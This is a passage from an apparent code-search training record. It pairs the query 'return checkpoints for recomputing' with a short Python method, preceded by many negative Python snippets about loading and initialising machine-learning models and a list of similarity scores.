encoder_name == 'cnn8':\n encoder = models.Cnn8(context_len=cfg.context_len,\n in_dim=embedder.embed_dim,\n hidden_dim=cfg.hidden_dim)\n elif encoder_name in ['gru', 'lstm', 'sru']:\n encoder = models.RnnEncoder(context_len=cfg.context_len,\n in_dim=embedder.embed_dim,\n out_dim=cfg.hidden_dim,\n cell=encoder_name)\n else:\n raise ValueError('unknown model name: %s' % cfg.model_name)\n\n # Build Decoder\n if decoder_name.lower() == 'fc':\n decoder = models.FCDecoder(in_dim=encoder.out_dim,\n hidden_dim=cfg.hidden_dim,\n n_tags=cfg.n_tags)\n elif decoder_name in ['gru', 'lstm', 'sru']:\n decoder = models.RnnDecoder(in_dim=encoder.out_dim,\n hidden_dim=cfg.hidden_dim,\n n_tags=cfg.n_tags,\n num_layers=cfg.num_layers,\n cell=decoder_name)\n\n model = models.Ner(embedder, encoder, decoder)\n\n return model", "def load_model(self, gpus=1):\r\n\t\t\r\n\t\tif self.model != None:\r\n\t\t\treturn\r\n\r\n\t\t## build the model on the CPU if parallelism is targeted\r\n\t\tif isinstance(gpus, Sequence):\r\n\t\t\tif len(gpus) != 1:\r\n\t\t\t\tdevice = \"/cpu:0\"\r\n\t\t\t\tmultigpu = True\r\n\t\t\telse:\r\n\t\t\t\tdevice = \"/gpu:{:d}\".format(gpus[0])\r\n\t\t\t\tmultigpu = False\r\n\t\telse:\r\n\t\t\tif gpus != 1:\r\n\t\t\t\tdevice = \"/cpu:0\"\r\n\t\t\t\tmultigpu = True\r\n\t\t\telse:\r\n\t\t\t\tdevice = \"/gpu:{:d}\".format(gpus)\r\n\t\t\t\tmultigpu = False\r\n\r\n\r\n\t\tif self.__prop__(\"Resume\"):\r\n\t\t\tself.model = keras.models.load_model(\r\n\t\t\t\tself.__prop__(\"SnapshotDirectory\") + self.__prop__(\"Prefix\") + self.__prop__(\"Resume\") + '.h5\"')\r\n\t\t\tself.single_model = self.model\r\n\t\t\tif multigpu:\r\n\t\t\t\tself.model = multi_gpu_model(self.model, gpus)\r\n\t\telse: \r\n\t\t\t\r\n\t\t\twith tensorflow.device(device):\r\n\t\t\t\tif self.__prop__(\"Prefix\").startswith(\"i3PosNet_VGG16\"):\r\n\t\t\t\t\tself.model = i3PosNetVGG(\r\n\t\t\t\t\t\tinput_shape=self.__prop__(\"InputShape\"), \r\n\t\t\t\t\t\tout_number=self.__prop__(\"TargetShape\"),\r\n\t\t\t\t\t\tlayer_count=self.__prop__(\"LayerCount\"), \r\n\t\t\t\t\t\tfc_layer_count=self.__prop__(\"FCLayerCount\"), \r\n\t\t\t\t\t\tfc_reg=self.__prop__(\"FCReg\"), \r\n\t\t\t\t\t\tconv_reg=self.__prop__(\"ConvReg\"), \r\n\t\t\t\t\t\tshrinking=self.__prop__(\"Shrinking\"),\r\n\t\t\t\t\t\tpadding=self.__prop__(\"Padding\"))\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.model = i3PosNet(image_shape, out = self.__prop__(\"TargetShape\"))\r\n\r\n\t\t\tself.single_model = self.model\r\n\t\t\tif multigpu:\r\n\t\t\t\tself.model = multi_gpu_model(self.model, gpus)\r\n\t\t\t\t\r\n\t\t\t# clear model\r\n\t\t\t# try:\r\n\t\t\t\t# del self.model\r\n\t\t\t# except:\r\n\t\t\t\t# pass\r\n\r\n\t\t\tif self.__prop__(\"Optimizer\") == \"SGD\":\r\n\t\t\t\toptimizer = SGD(\r\n\t\t\t\t\tlr=self.__prop__(\"BaseLR\"),\r\n\t\t\t\t\tdecay=self.__prop__(\"Gamma\") if self.__prop__(\"LRPolicy\") == \"decay\" else 0.,\r\n\t\t\t\t\tmomentum= self.__prop__(\"Momentum\"),\r\n\t\t\t\t\tnesterov=True)\r\n\t\t\telif self.__prop__(\"Optimizer\") == \"Adam\":\r\n\t\t\t\toptimizer = Adam(\r\n\t\t\t\t\tlr=self.__prop__(\"BaseLR\"),\r\n\t\t\t\t\tdecay=self.__prop__(\"Gamma\") if self.__prop__(\"LRPolicy\") == \"decay\" else 0.,\r\n\t\t\t\t\t# use defaults for these for now (b1 = 0.9, b2 = 0.999, e = 1e-8\r\n\t\t\t\t\tbeta_1=self.__prop__(\"Beta1\"),\r\n\t\t\t\t\tbeta_2=self.__prop__(\"Beta2\"),\r\n\t\t\t\t\tepsilon=self.__prop__(\"Epsilon\")\r\n\t\t\t\t\t)\r\n\t\t\t\r\n\t\t\tself.model.compile(loss='mean_squared_error', optimizer=optimizer)", "def setup_ml():\n # load vocabulary\n vocab = open(f\"{VOCABULARY_FILE}\", \"rb\")\n vocab = pickle.load(vocab)\n\n # transformer to preprocess images\n transform_test = transforms.Compose([ \n transforms.Resize(256), \n transforms.RandomCrop(224), \n transforms.RandomHorizontalFlip(), \n transforms.ToTensor(), \n transforms.Normalize((0.485, 0.456, 0.406), \n (0.229, 0.224, 0.225))])\n\n # Initialize the encoder and decoder, and set each to inference mode.\n encoder = EncoderCNN(EMBED_SIZE)\n encoder.eval()\n decoder = DecoderRNN(EMBED_SIZE, HIDDEN_SIZE, VOCAB_SIZE)\n decoder.eval()\n\n # load encoder\n encoder.load_state_dict(\n torch.load(\n os.path.join('./models', ENCODER_FILE),\n map_location=torch.device('cpu')\n )\n )\n\n # load decoder\n decoder.load_state_dict(\n torch.load(\n os.path.join('./models', DECODER_FILE),\n map_location=torch.device('cpu')\n )\n )\n print(\"\\n-- Model components were imported succesfully! -- \\n\")\n return transform_test, encoder, decoder, vocab", "def test_export_pytorch_model(self):\n pytorch_model = PyTorchLinear()\n dummy_input = torch.empty(10, 10)\n\n with io.BytesIO() as f:\n onnx_converter._export_pytorch_model(f, pytorch_model, dummy_input)", "def _load_best_model(self) -> None:\n self.trainer.resume()", "def main_strategy_2():\n en_text, de_text, train_iter, dev_iter, _ = clean_data_strategy_2()\n embedding_en, embedding_de = get_GloVe_embedding(en_text, de_text)\n model = Model(len(en_text.vocab), len(de_text.vocab), 300, embedding_en, embedding_de)\n train(model, train_iter, dev_iter)", "def setup_fixed_model():\n out = {}\n out['Q'] = Q\n out['X'] = X\n out['y'] = y\n\n return out", "def setup(self):\n print(\"setup\")\n \n self.modelToUse = 1\n if self.train:\n print(\"train\")\n else:\n print(\"no train\")\n \n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n self.envSize = 17\n \n #init model\n if self.train or not os.path.isfile(\"my-saved-model.pt\"):\n self.logger.info(\"Setting up model from scratch.\")\n if self.modelToUse == 0:\n self.policy_net = Model_global_view(self.envSize, self.envSize, 6).to(device)\n self.model = Model_global_view(self.envSize, self.envSize, 6).to(device)\n elif self.modelToUse == 1:\n self.policy_net = Model_local_view(self.envSize, self.envSize, 6).to(device)\n self.model = Model_local_view(self.envSize, self.envSize, 6).to(device)\n else:\n self.policy_net = Model_combined_view(self.envSize, self.envSize, 6).to(device)\n self.model = Model_combined_view(self.envSize, self.envSize, 6).to(device)\n self.model.load_state_dict(self.policy_net.state_dict())\n self.model.eval()\n else:\n self.logger.info(\"Loading model from saved state.\")\n with open(\"my-saved-model.pt\", \"rb\") as file:\n if self.modelToUse == 0:\n self.model = Model_global_view(self.envSize, self.envSize, 6)\n elif self.modelToUse == 1:\n self.model = Model_local_view(self.envSize, self.envSize, 6)\n else:\n self.model = Model_combined_view(self.envSize, self.envSize, 6)\n if torch.cuda.is_available():\n self.model.load_state_dict(torch.load(file))\n self.model.to(device)\n else:\n self.model.load_state_dict(torch.load(file, map_location=device))", "def __init__(self):\n self.device = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\n \n self.model = models.resnet101() \n self.model.load_state_dict(torch.load(WEIGHTS_DIR))\n \n self.model.to(self.device)\n \n self.model.eval()\n \n # labels\n with open(LABELS, 'r') as f:\n self.labels = ast.literal_eval(f.read())\n \n # define data transform\n self.transform = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])", "def read_model(self):\n f = open(self.name + '_' + 'words', 'r')\n self.words = f.read()\n f.close()\n elf.words = dict(eval(self.words))\n \n f = open(self.name + '_' + 'word_lengths', 'r')\n self.word_lengths = f.read()\n f.close()\n self.word_lengths = dict(eval(self.word_lengths))\n\n f = open(self.name + '_' + 'sentence_lengths', 'r')\n self.sentence_lengths = f.read()\n f.close()\n self.sentence_lengths = dict(eval(self.sentence_lengths))\n\n f = open(self.name + '_' + 'stems', 'r')\n self.stems = f.read()\n f.close()\n self.stems = dict(eval(self.stems))\n\n f = open(self.name + '_' + 'commas_per_sentence', 'r')\n self.commas_per_sentence = f.read()\n f.close()\n self.commas_per_sentence = dict(eval(self.commas_per_sentence))", "def get_model():\n return UNISAL", "def __init__(self, name: str, \n model_path: str=None,\n model_online_path: str=None,\n description: str='',\n model_type: str=None) -> None:\n model = None\n if model_path:\n archive = load_archive(model_path)\n model = AllenPredictor.from_archive(archive, model_type)\n elif model_online_path:\n model = AllenPredictor.from_path(model_online_path, model_type)\n self.predictor = model\n Predictor.__init__(self, name, description, model, ['accuracy'])", "def load_model(model_name):\n if hasattr(torchvision.models, model_name):\n with torch.no_grad():\n if model_name.startswith(\"inception\"):\n height = width = 299\n mean = [0.5, 0.5, 0.5]\n std = [0.5, 0.5, 0.5]\n else:\n height = width = 224\n mean = [0.485, 0.456, 0.406]\n std = [0.229, 0.224, 0.225]\n input_shape = [1, 3, height, width]\n input_data = torch.randn(input_shape).float()\n for channel in range(3):\n input_data[:, channel] -= mean[channel]\n input_data[:, channel] /= std[channel]\n model = getattr(torchvision.models, model_name)(pretrained=True)\n model = model.float().eval()\n return model, [input_data]\n try:\n import pretrainedmodels\n if hasattr(pretrainedmodels, model_name):\n return load_pretrainedmodels(model_name)\n except ModuleNotFoundError:\n raise ModuleNotFoundError(\"Please install pretrainedmodels.pytorch\")\n raise RuntimeError(\"Model not supported\")", "def load_custom_model(model_name):\n if model_name==\"AlexNet\":\n print(\"Loading pretrained AlexNet Model\")\n model = models.alexnet()\n num_ftrs = model.classifier[6].in_features\n model.classifier[6] = nn.Linear(num_ftrs, 100)\n elif model_name==\"ResNet18\":\n print(\"Loading ResNet18 Model\")\n model = models.resnet18() #Load the pytorch. torchvision model\n num_ftrs = model.fc.in_features\n model.fc = nn.Linear(num_ftrs, 100) #Set it to match the ImageNet-100 Classes.\n elif model_name==\"ResNet50\":\n print(\"Loading ResNet50 Model\")\n model = models.resnet50()\n num_ftrs = model.fc.in_features\n model.fc = nn.Linear(num_ftrs, 100) #ImageNet-100 has 100 classes.\n elif model_name==\"DenseNet\":\n print(\"Loading DenseNet161 Model\")\n model = models.densenet161()\n num_ftrs = model.classifier.in_features\n model.classifier = nn.Linear(num_ftrs, 100)\n elif model_name==\"MyNet\":\n print(\"Loading Pyramid Model\")\n model = pyramid_net.create_model() # Load the model I implemented.\n\n if cfg.load_model_true: # Load the model that was stopped during training.\n model.load_state_dict(torch.load(cfg.load_model_path))\n\n return model", "def test_load_model():\n model = BERTopic(language=\"Dutch\", embedding_model=None, n_components=12)\n model.save(\"test\")\n loaded_model = BERTopic.load(\"test\")\n assert type(model) == type(loaded_model)\n assert model.language == loaded_model.language\n assert model.embedding_model == loaded_model.embedding_model\n assert model.top_n_words == loaded_model.top_n_words\n assert model.n_neighbors == loaded_model.n_neighbors\n assert model.n_components == loaded_model.n_components", "def initialize_model(model_name, num_classes, feature_extract, verbose=False):\n\n model_ft = None\n\n if model_name == \"resnet\":\n \"\"\" Resnet18\n \"\"\"\n model_ft = models.resnet18(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\n\n elif model_name == \"alexnet\":\n \"\"\" Alexnet\n \"\"\"\n model_ft = models.alexnet(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier[6].in_features\n model_ft.classifier[6] = nn.Linear(num_ftrs, num_classes)\n\n elif model_name == \"vgg\":\n \"\"\" VGG11_bn\n \"\"\"\n model_ft = models.vgg11_bn(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier[6].in_features\n model_ft.classifier[6] = nn.Linear(num_ftrs, num_classes)\n\n elif model_name == \"squeezenet\":\n \"\"\" Squeezenet\n \"\"\"\n with warnings.catch_warnings(): # temporarily suppress warnings about deprecated functions\n warnings.simplefilter(\"ignore\")\n model_ft = models.squeezenet1_0(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n model_ft.classifier[1] = nn.Conv2d(512, num_classes, kernel_size=(1, 1), stride=(1, 1))\n model_ft.num_classes = num_classes\n\n elif model_name == \"densenet\":\n \"\"\" Densenet\n \"\"\"\n model_ft = models.densenet121(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier.in_features\n model_ft.classifier = nn.Linear(num_ftrs, num_classes)\n\n elif model_name == \"inception\":\n \"\"\" Inception v3\n Be careful, expects (299,299) sized images and has auxiliary output\n \"\"\"\n model_ft = models.inception_v3(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n # Handle the auxilary net\n num_ftrs = model_ft.AuxLogits.fc.in_features\n model_ft.AuxLogits.fc = nn.Linear(num_ftrs, num_classes)\n # Handle the primary net\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\n\n else: # Unreachable\n exit()\n\n # Gather the parameters to be optimized\n params_to_update = list(filter(lambda p: p.requires_grad, model_ft.parameters()))\n\n # Print model info\n if verbose:\n print()\n print(model_ft)\n print()\n print(\"Params to learn:\")\n for name, param in model_ft.named_parameters():\n if param.requires_grad:\n print('\\t', name)\n\n return model_ft, params_to_update", "def load_pretrained_model(self,model_dir):\n rnn_params = json.load(open(os.path.join(model_dir,\n \"./model.json\")))[\"rnn\"]\n\n logging.info(\"Loading model from: {}\".format(model_dir))\n self.create_training_model(model_dir = model_dir,\n **rnn_params)\n #从目录中读取神经网络参数\n self.set_model_from_file()", "def load_our_model():\n \n model = load_model('2ndMelSpecModel.h5')\n train_generator, validation_generator = make_generators()\n \n history = model.fit_generator(\n train_generator,\n steps_per_epoch= 145,\n epochs= 30,\n validation_data=validation_generator,\n validation_steps=50)\n plotHistory(history)", "def pretrained(name=\"t5_small\", lang=\"en\", remote_loc=None):\n from sparknlp.pretrained import ResourceDownloader\n return ResourceDownloader.downloadModel(T5Transformer, name, lang, remote_loc)", "def predict_only(self):", "def test_persistence_old_model(self):\n loaded = PoincareModel.load(datapath('poincare_test_3.4.0'))\n self.assertEqual(loaded.kv.syn0.shape, (239, 2))\n self.assertEqual(len(loaded.kv.vocab), 239)\n self.assertEqual(loaded.size, 2)\n self.assertEqual(len(loaded.all_relations), 200)", "def model(self):", "def model(self):", "def model(self):", "def model(self):", "def model(self):", "def set_vanilla_model(self):\n logging.debug(\"Setting vanilla model\")\n # Build model\n\n ## Embedding Layer\n word_embedding_layer = self.embed_word()\n pos_embedding_layer = self.embed_pos()\n\n ## Deep layers\n latent_layers = self.stack_latent_layers(self.num_of_latent_layers)\n\n ## Dropout\n dropout = Dropout(self.pred_dropout)\n\n ## Prediction\n predict_layer = self.predict_classes()\n\n ## Prepare input features, and indicate how to embed them\n inputs_and_embeddings = [(Input(shape = (self.sent_maxlen,),\n dtype=\"int32\",\n name = \"word_inputs\"),\n word_embedding_layer),\n (Input(shape = (self.sent_maxlen,),\n dtype=\"int32\",\n name = \"predicate_inputs\"),\n word_embedding_layer),\n (Input(shape = (self.sent_maxlen,),\n dtype=\"int32\",\n name = \"postags_inputs\"),\n pos_embedding_layer),\n ]\n\n ## Concat all inputs and run on deep network\n output = predict_layer(dropout(latent_layers(merge([embed(inp)\n for inp, embed in inputs_and_embeddings],\n mode = \"concat\",\n concat_axis = -1))))\n\n # Build model\n self.model = Model(input = map(itemgetter(0), inputs_and_embeddings),\n output = [output])\n\n # Loss\n self.model.compile(optimizer='adam',\n loss='categorical_crossentropy',\n metrics=['categorical_accuracy'])\n self.model.summary()\n\n # Save model json to file\n self.save_model_to_file(os.path.join(self.model_dir, \"model.json\"))", "def load_NMF_model():\n model = pickle.load(open(\"models/nmf_model.sav\", 'rb'))\n Q = model.components_ \n return model, Q", "def load_onnx_model(self):\n print(\"Loading Rescue Detection Model\")\n\n self.rescue_model = cv2.dnn.readNetFromONNX(os.path.join(\n os.path.dirname(os.path.realpath(__file__)),\n rescue_cnn_model_path))\n\n self.rescue_model.setPreferableTarget(Rescue_PI.preferable_target)", "def readmodel(model = 'dominguez'):\n ebl_file_path = os.path.join(os.path.split(__file__)[0],'data/')\n\n if model == 'kneiske':\n file_name = join(ebl_file_path , 'ebl_nuFnu_tanja.dat')\n elif model == 'franceschini':\n file_name = join(ebl_file_path , 'ebl_franceschini.dat')\n elif model == 'dominguez':\n file_name = join(ebl_file_path , 'ebl_dominguez11.out')\n elif model == 'dominguez-upper':\n file_name = join(ebl_file_path , 'ebl_upper_uncertainties_dominguez11.out')\n elif model == 'dominguez-lower':\n file_name = join(ebl_file_path , 'ebl_lower_uncertainties_dominguez11.out')\n elif model == 'inoue':\n file_name = join(ebl_file_path , 'EBL_z_0_baseline.dat')\n #file_name = join(ebl_file_path , 'EBL_proper_baseline.dat')\n elif model == 'inoue-low-pop3':\n file_name = join(ebl_file_path , 'EBL_z_0_low_pop3.dat')\n #file_name = join(ebl_file_path , 'EBL_proper_low_pop3.dat')\n elif model == 'inoue-up-pop3':\n file_name = join(ebl_file_path , 'EBL_z_0_up_pop3.dat')\n #file_name = join(ebl_file_path , 'EBL_proper_up_pop3.dat')\n elif model == 'gilmore':\n file_name = join(ebl_file_path , 'eblflux_fiducial.dat')\n elif model == 'gilmore-fixed':\n file_name = join(ebl_file_path , 'eblflux_fixed.dat')\n elif model == 'cuba':\n file_name = join(ebl_file_path , 'CUBA_UVB.dat')\n elif model == 'finke':\n file_name = join(ebl_file_path , 'ebl_modelC_Finke.txt')\n else:\n raise ValueError(\"Unknown EBL model chosen!\")\n\n data = np.loadtxt(file_name)\n if model.find('inoue') >= 0:\n z = np.array([0.])\n #z = data[0,1:]\n #nuInu = data[:,1]\n lmu = data[:,0]\n nuInu = np.array([data[:,1]]).T\n raise ValueError('Inoue models not correctly implemented at the moment, choose another model')\n\n elif model.find('gilmore') >= 0:\n z = data[0,1:]\n lmu = data[1:,0] * 1e-4 # convert from Angstrom to micro meter\n nuInu = data[1:,1:] \n nuInu[nuInu == 0.] = 1e-20 * np.ones(np.sum(nuInu == 0.))\n \n # convert from ergs/s/cm^2/Ang/sr to nW/m^2/sr\n nuInu = (nuInu.T * data[1:,0]).T * 1e4 * 1e-7 * 1e9 \n\n elif model == 'cuba':\n z = data[0,1:-1]\n lmu = data[1:,0] * 1e-4\n nuInu = data[1:,1:-1]\n\n # replace zeros by 1e-40\n idx = np.where(data[1:,1:-1] == 0.)\n nuInu[idx] = np.ones(np.sum(nuInu == 0.)) * 1e-20\n\n # in erg / cm^2 / s / sr\n nuInu = (nuInu.T * c.c.value / (lmu * 1e-6)).T \n nuInu *= 1e6 # in nW / m^2 / sr\n\n # check where lmu is not strictly increasing\n idx = np.where(np.diff(lmu) == 0.)\n for i in idx[0]:\n lmu[i+1] = (lmu[i + 2] + lmu[i]) / 2.\n\n else:\n z = data[0,1:]\n lmu = data[1:,0]\n nuInu = data[1:,1:]\n if model == 'finke': \n lmu = lmu[::-1] * 1e-4\n nuInu = nuInu[::-1]\n\n return EBL(z,lmu,nuInu, model = model)", "def reconstruct_input_ext(self, model_in):", "def resnet34(pretrained=False):\n model = ResNet(BasicBlock, [3, 4, 6, 3])\n if pretrained:\n model.load_state_dict(model_zoo.load_url(model_urls['resnet34']))\n return model", "def _get_model():\n freezing = os.environ.get('NAUCSE_FREEZE', not app.config['DEBUG'])\n initialize = True\n\n try:\n g.model = app.config['NAUCSE_MODEL']\n except KeyError:\n g.model = init_model()\n app.config['NAUCSE_MODEL'] = g.model\n else:\n if freezing:\n # Model already initialized; don't look for changes\n return\n\n # (Re-)initialize model\n\n g.model.load_licenses(Path(app.root_path).parent / 'licenses')\n g.model.load_local_courses(Path(app.root_path).parent)\n\n if freezing:\n g.model.freeze()", "def main():\n df = prepro_last()\n X, y = train_build(df)\n fit_store(X, y)" ]
[ "0.64619243", "0.63850045", "0.63135374", "0.6303723", "0.62750506", "0.62338805", "0.6216982", "0.6216971", "0.6207287", "0.61998534", "0.6164519", "0.6160022", "0.61489826", "0.6124723", "0.61036414", "0.60924315", "0.6061764", "0.60476965", "0.60332507", "0.60278857", "0.6027397", "0.60240763", "0.60190946", "0.6016885", "0.60148865", "0.6012249", "0.6012162", "0.5999457", "0.59943676", "0.59920955", "0.5962204", "0.59577227", "0.59352607", "0.59347224", "0.5916451", "0.5915794", "0.59142876", "0.59110755", "0.5908786", "0.5902896", "0.5901237", "0.58980024", "0.5886278", "0.5885651", "0.588398", "0.5871296", "0.58682543", "0.5867478", "0.58674335", "0.58545023", "0.5852693", "0.58387935", "0.5827888", "0.5824709", "0.5816585", "0.58156294", "0.58146495", "0.5811856", "0.5806191", "0.5798871", "0.5798801", "0.57984173", "0.5780826", "0.57792413", "0.57676697", "0.5760369", "0.5757007", "0.57541287", "0.57505244", "0.5744312", "0.5737968", "0.57360774", "0.57337976", "0.57331485", "0.57282186", "0.5725215", "0.5724573", "0.57235384", "0.5719074", "0.5715155", "0.5714414", "0.5713664", "0.57117325", "0.5709275", "0.57074606", "0.57062346", "0.57042783", "0.5700574", "0.56996024", "0.56996024", "0.56996024", "0.56996024", "0.56996024", "0.569126", "0.56859314", "0.5685509", "0.56850445", "0.5681664", "0.56806296", "0.5679945", "0.5679292" ]
0.0
-1
return checkpoints for recomputing
def get_checkpoints(self): # recompute checkpoints return self._checkpoints
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def checkpoint():", "def checkpoint_set():\n checkpoints.append(list())", "def get_all_overall_checkpoint(cls):\n return cls.create_all_overall_checkpoint()", "def get_checkpoint_list(cls):\n return cls.create_checkpoint_list()", "def checkpoint(self):\r\n return self._checkpoint", "def finish_checkpoint(self):\n return self.this_evaluation.checkpoint", "def create_all_overall_checkpoint(cls):\n return DB.read_all_overall_checkpoint()", "def callstack_now():\n return checkpoints[-1]", "def parse_checkpoint(self):\n pass", "def checkpoint(self):\n return self.__checkpoint", "def get_checkpoint_snapshot(self):\n try:\n __method_name = inspect.currentframe().f_code.co_name\n checkpoint = self.state.get()\n if checkpoint:\n checkpoint = json.loads(checkpoint)\n checkpoint = checkpoint.get(\"snapshot\")\n self.applogger.info(\n \"{}(method={}) : {} : Checkpoint list fetched successfully.\".format(\n consts.LOGS_STARTS_WITH, __method_name, self.function_name\n )\n )\n else:\n checkpoint = []\n self.state.post(json.dumps({\"snapshot\": checkpoint}))\n self.applogger.info(\n \"{}(method={}) : {} : Checkpoint list not found. Created new checkpoint list.\".format(\n consts.LOGS_STARTS_WITH, __method_name, self.function_name\n )\n )\n return checkpoint\n except Exception as ex:\n self.applogger.error(\n '{}(method={}) : {} : Unexpected error while getting checkpoint list: err=\"{}\"'.format(\n consts.LOGS_STARTS_WITH, __method_name, self.function_name, str(ex)\n )\n )\n raise Exception(ex)", "def get_checkpoint_data(self) -> Dict[str, Any]:\n # get ckpt file path from config.trainer.params.resume_from_checkpoint\n path = self.config.trainer.params.get(\"resume_from_checkpoint\", None)\n if path is not None:\n is_zoo = self.is_zoo_path(path)\n ckpt_filepath = path\n if is_zoo:\n folder = download_pretrained_model(path)\n ckpt_filepath = get_ckpt_path_from_folder(folder)\n ckpt = get_ckpt_from_path(ckpt_filepath)\n config = get_config_from_folder_or_ckpt(folder, ckpt)\n else:\n ckpt = get_ckpt_from_path(ckpt_filepath)\n config = None\n\n return {\n \"ckpt\": ckpt,\n \"checkpoint_path\": ckpt_filepath,\n \"is_zoo\": is_zoo,\n \"config\": config,\n }\n\n is_zoo = False\n config = None\n ckpt = None\n # get ckpt file path from config.checkpoint\n ckpt_config = self.config.checkpoint\n suffix = \"best.ckpt\" if ckpt_config.resume_best else \"current.ckpt\"\n path = os.path.join(get_mmf_env(key=\"save_dir\"), suffix)\n ckpt_filepath = None\n resume_from_specified_path = (\n ckpt_config.resume_file is not None or ckpt_config.resume_zoo is not None\n ) and (not ckpt_config.resume or not PathManager.exists(path))\n if resume_from_specified_path:\n if ckpt_config.resume_file and PathManager.exists(ckpt_config.resume_file):\n ckpt_filepath = ckpt_config.resume_file\n elif ckpt_config.resume_zoo is not None:\n is_zoo = True\n folder = download_pretrained_model(ckpt_config.resume_zoo)\n ckpt_filepath = get_ckpt_path_from_folder(folder)\n ckpt = get_ckpt_from_path(ckpt_filepath)\n config = get_config_from_folder_or_ckpt(folder, ckpt)\n else:\n raise RuntimeError(f\"{ckpt_config.resume_file} doesn't exist\")\n\n if ckpt_config.resume and PathManager.exists(path):\n ckpt_filepath = path\n\n if ckpt_filepath is not None:\n ckpt = get_ckpt_from_path(ckpt_filepath)\n\n return {\n \"ckpt\": ckpt,\n \"checkpoint_path\": ckpt_filepath,\n \"is_zoo\": is_zoo,\n \"config\": config,\n }", "def get_checkpoint(self, metrics):\n assert all(metric in metrics for metric in [\"acc1\", \"acc5\", \"acc10\", \"unsupervised\", \"total\"]), \"Not all metrics found\"\n checkpoint = OrderedDict()\n for metric in metrics:\n checkpoint[metric] = metrics[metric]\n checkpoint['map_params'] = self.transform.state_dict()\n return checkpoint", "def _restore(self):\n\n output_path = self.output_path + '/checkpoints/'\n checkpoint = tf.train.latest_checkpoint(output_path)\n if checkpoint:\n self.saver.restore(self.session, save_path=checkpoint)\n restored_step = int(checkpoint.split('-')[-1]) # Robust enough?\n return restored_step\n logging.info('Starting training from scratch.')\n return 0", "def find_latest_checkpoint(self) -> Tuple[str, str]:\n return {}", "def create_checkpoint_list(cls):\n checkpoint_data = DB.read_checkpoint_record_list()\n return [Checkpoint(*checkpoint) for checkpoint in checkpoint_data]", "def get_checkpoint():\n\timport numpy as np\n\n\tcheckpoint = []\n\tfor directory in directories:\n\t\ttry: # try to find folder\n\t\t\tos.chdir('./'+directory)\n\t\texcept:\n\t\t\tcontinue\n\t\tcontents = os.listdir('./')\n\t\tif contents == []: # if folder is empty\n\t\t\tprint(\"No data for\", directory)\n\t\t\tos.chdir('..')\n\t\t\tcontinue\n\t\tcounter = []\n\t\tfor entry in contents:\n\t\t\tentry = entry.split('.')\n\t\t\tnum = entry[0][2:]\n\t\t\ttry: # excludes files that aren't of type x-y.jpg\n\t\t\t\tnum = int(num)\n\t\t\t\tcounter.append(num)\n\t\t\texcept:\n\t\t\t\tcontinue\n\t\tcheckpoint.append(max(counter))\n\t\tos.chdir('..')\n\tcheckpoint = np.mean(checkpoint)\n\treturn checkpoint", "def find_checkpoint(self, checkpoints, current_time):\n checkpoint_line_len = N.zeros(len(checkpoints), dtype=float)\n checkpoint_distances = N.zeros(len(checkpoints), dtype=float)\n checkpoint_chosen = False\n\n for i in range(len(checkpoints)):\n checkpoint_line_len[i] = checkpoints[i].get_line_length()\n checkpoint_distances[i] = self._calc_distance(checkpoints[i].location)\n \n min_length = N.min(checkpoint_line_len)\n min_dist = N.min(checkpoint_distances)\n # If the min_length of all lines is > 0, divide all lengths by the min_length\n if (min_length > 0):\n checkpoint_line_len = checkpoint_line_len / min_length\n # Same idea for the distances\n if (min_dist > 0):\n checkpoint_ratios = checkpoint_distances / min_dist\n else:\n checkpoint_ratios = checkpoint_distances\n \n # Add these values together, and choose the smallest value\n checkpoint_rankings = checkpoint_ratios + checkpoint_line_len\n min_index = N.argmin(checkpoint_rankings)\n # found the target checkpoint, set that as the target_checkpoint\n checkpoint_candidate = checkpoints[min_index]\n if self.checkpoint_target is None or self.checkpoint_target is not checkpoint_candidate:\n if self.checkpoint_target is not None:\n print(\"Attendee:\", self.attendee_id, \"has changed checkpoint target from:\",\\\n self.checkpoint_target.get_location(), \"to checkpoint at:\",\\\n checkpoint_candidate.get_location())\n self.checkpoint_target = checkpoint_candidate\n self._calc_checkpoint_arrival(checkpoint_distances[min_index], current_time)\n self._set_checkpoint_vector(self.checkpoint_target.get_location())\n \n return self.checkpoint_target", "def variable_progression():\n\t# files = glob.glob('parameter_checkpoints/epoch-*[!.meta]')\n\tfiles = glob.glob('parameter_checkpoints/epoch-*')\n\n\t# reorder epochs by 'human order' otherwise it would order it as 1,110,12,...\n\t# http://stackoverflow.com/questions/5967500/how-to-correctly-sort-a-string-with-a-number-inside\n\tdef atoi(text):\n\t return int(text) if text.isdigit() else text\n\n\tdef natural_keys(text):\n\t '''\n\t alist.sort(key=natural_keys) sorts in human order\n\t http://nedbatchelder.com/blog/200712/human_sorting.html\n\t (See Toothy's implementation in the comments)\n\t '''\n\t return [ atoi(c) for c in re.split('(\\d+)', text) ]\n\n\tfiles.sort(key=natural_keys)\n\n\tx, W, bh, bv = rbm.get_variables()\n\ttrainable_vars = [W, bh, bv]\n\n\tsaver = tf.train.Saver(trainable_vars)\t# restore the weights and biases of the trained model\n\n\tweights = []\n\tbhs = []\n\tbvs = []\n\twith tf.Session() as sess:\n\t\tinit = tf.initialize_all_variables()\t\n\t\tsess.run(init)\n\t\t# iterate through each saved epoch checkpoint, and add the W, bh, and bv matrices to their\n\t\t# respective lists\n\t\tfor f in files:\n\t\t\tsaver.restore(sess, f)\t\t# load the saved weights and biases from a given epoch checkpoint file\n\t\t\tweights.append(W.eval())\t\n\t\t\tbhs.append(bh.eval())\n\t\t\tbvs.append(bv.eval())\n\n\treturn weights, bhs, bvs", "def fit(self):\n # Iterate and train.\n step_file = self.checkpointer.get_step_file()\n 